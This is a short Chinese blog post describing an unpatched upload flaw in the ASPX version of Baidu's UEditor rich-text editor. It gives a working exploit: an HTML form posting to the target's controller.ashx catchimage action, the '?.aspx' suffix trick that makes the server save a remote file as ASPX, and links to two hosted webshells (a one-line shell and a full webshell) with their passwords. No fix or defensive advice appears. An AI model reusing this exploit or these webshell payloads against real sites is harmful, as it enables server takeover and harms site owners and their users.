ueditor编辑器上传漏洞

能金SEO SEO心得 2020-03-27 1322 0

  UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。开源基于BSD协议,所有源代码在协议允许范围内可自由修改和使用。百度UEditor的推出,可以帮助不少网站开发者在开发富文本编辑器所遇到的难题,节约开发者因开发富文本编辑器所需要的大量时间,有效降低了企业的开发成本。

ueditor编辑器上传漏洞 第1张

微信号:Njkj-6688
添加微信好友, 获取相关信息
复制微信号

  ueditor ASPX 版本由于远程抓取代码缺陷导致的安全漏洞, 官方仍未修复

  controller.ashx 文件默认在网站根目录

  输入框里填写远程图片地址 + ?.aspx, 如 http://exp10it.cn/1.gif?.aspx

  <form action=”http://target/controller.ashx?action=catchimage”enctype=”application/x-www-form-urlencoded” method=”POST”>

  <p>shell addr:<input type=”text” name=”source[]” /></p >

  <input type=”submit” value=”Submit” />

  </form>

  一句话 密码 xz

  https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/1.gif?.aspx

  大马 密码 r00ts

  https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/2.gif?.aspx


评论